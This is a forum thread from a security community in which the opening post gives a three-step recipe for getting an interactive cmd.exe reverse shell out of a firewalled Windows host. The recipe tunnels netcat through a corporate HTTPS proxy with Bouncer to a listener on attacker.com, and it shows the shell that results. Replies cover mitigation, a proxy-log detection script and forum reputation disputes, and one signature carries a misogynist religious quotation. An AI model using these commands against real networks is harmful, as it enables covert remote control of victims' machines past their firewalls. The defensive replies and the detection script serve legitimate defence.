Gaining an interactive shell through SSL tunneling

Thread: Gaining an interactive shell through SSL tunneling

  1. #1
    Junior Member
    Join Date
    Oct 2003
    Posts
    2

    Gaining an interactive shell through SSL tunneling

    I apologize if you already know this, but to those who don't:

    You can get an interactive cmd.exe shell from a firewalled host if that host has access to an HTTP proxy server that supports HTTPS.

    The tools required are the win32 ports of NetCat and Bouncer from http://nlxoo.8bit.co.uk/

    In this example, attacker.com is the attacker's host, victim.company.com is the victim's host and proxy.company.com is the victim's HTTP proxy server.

    Step 1:
    On attacker.com, the attacker executes:
    Code:
    nc.exe -l -p 443
    Step 2:
    On victim.company.com, the attacker executes:
    Code:
    bouncer.exe --bind 127.0.0.1 --port 9999 --destination attacker.com:443 --tunnel proxy.company.com:8080
    Step 3:
    On victim.company.com, the attacker executes:
    Code:
    nc.exe -e cmd.exe 127.0.0.1 9999
    Result:
    Inside the window from Step 1, the attacker gets the shell:
    Code:
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\Documents and Settings\nlxoo\Desktop\test>
    Note:
    1) If any of the programs or connections are terminated, the shell will be lost
    2) The proxy server must support HTTPS

  2. #2
    Senior Member br_fusion's Avatar
    Join Date
    Apr 2002
    Posts
    167
    Thanks for the info.

  3. #3
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,324
    Ok. So how would you prevent this from happening?
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

  4. #4
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    Easy, don't allow your DMZ servers to make outbound connections...case closed. It is just a twist on shoveling a reverse shell (the only difference is the encryption, which I would suppose you could probably do with cryptcat...hmm...maybe I have something to play with now).

    /nebulus
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)
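
The mitigation in post #4 can be checked against the proxy's own logs. The following is an added example, not part of any post in this thread: it reviews CONNECT entries and flags tunnels opened by DMZ hosts or held open unusually long. The Squid native access.log layout, the DMZ subnet, the allowlist, the duration threshold and the sample log lines are assumptions constructed for illustration.

```python
import ipaddress

# Assumptions (not from the thread): Squid native access.log layout, the DMZ
# subnet, the destination allowlist and the duration threshold.
DMZ_NET = ipaddress.ip_network("10.0.5.0/24")
ALLOWED_DESTS = {"update.vendor.example:443"}
MAX_TUNNEL_MS = 10 * 60 * 1000  # tunnels held open longer than this are reviewed

# Constructed sample lines: time elapsed_ms client code/status bytes method URL ...
SAMPLE_LOG = """\
1066000000.101 812 10.0.9.14 TCP_MISS/200 18344 CONNECT webmail.example:443 - DIRECT/198.51.100.20 -
1066000050.553 5400000 10.0.5.20 TCP_MISS/200 9120 CONNECT attacker.com:443 - DIRECT/203.0.113.7 -
1066000075.200 95 10.0.9.14 TCP_MISS/200 5120 GET http://intranet.example/ - DIRECT/10.0.1.5 text/html
1066000090.017 2250 10.0.5.21 TCP_MISS/200 40960 CONNECT update.vendor.example:443 - DIRECT/192.0.2.44 -
1066000120.300 7200000 10.0.9.30 TCP_MISS/200 2048 CONNECT host.example.net:443 - DIRECT/192.0.2.99 -
garbage line
"""

def parse_connect(line):
    """Return (client, dest, elapsed_ms) for a CONNECT entry, else None."""
    f = line.split()
    if len(f) < 7 or f[5] != "CONNECT":
        return None
    try:
        return ipaddress.ip_address(f[2]), f[6].lower(), int(f[1])
    except ValueError:
        return None  # malformed client address or duration

def review_tunnels(log_text):
    """Return (client, dest, reason) for each tunnel that violates the policy."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_connect(line)
        if rec is None:
            continue
        client, dest, elapsed = rec
        if dest in ALLOWED_DESTS:
            continue  # explicitly approved destination
        if client in DMZ_NET:
            findings.append((str(client), dest, "dmz-outbound"))
        elif elapsed > MAX_TUNNEL_MS:
            findings.append((str(client), dest, "long-lived"))
    return findings

if __name__ == "__main__":
    for finding in review_tunnels(SAMPLE_LOG):
        print(*finding)
```

Because the listener in post #1 sits on port 443, a proxy rule that only limits CONNECT to port 443 does not block this tunnel; the check has to key on which source hosts may use the proxy at all.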

  5. #5
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,324
    Duh! I wanted him to answer it... geez..

  6. #6
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    Oops :/

    EDIT: Dunno who negged him, but I can't tap him back up without massively awarding him...

  7. #7
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,786
    good lord/lordes! what a nightmare this could be... a disgruntled employee sets this to run friday night when no one's there.

    what jerk negged him. would you rather not know about it?
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  8. #8
    Senior Member br_fusion's Avatar
    Join Date
    Apr 2002
    Posts
    167
    You have to understand, people get neg'ed all the time for next to no reason. Anything that blurs the line between white/black turns into an instant neg.


    *few points i have, lost*

  9. #9
    Member
    Join Date
    Oct 2003
    Posts
    78
    So this dude gets hit with the green while poor newbie who actually points out the error sits there with some reds... someone fix this.. too bad I can't..
    Why won't anyone give me greenies???

  10. #10
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,786
    i guess it all depends on what you want to see here. IMO all non-security posts in security threads should be negged. this is in the right forum. and is definitely security related.

    even if he doesn't have an answer to msmittens' question someone else will...and another hole gets closed!
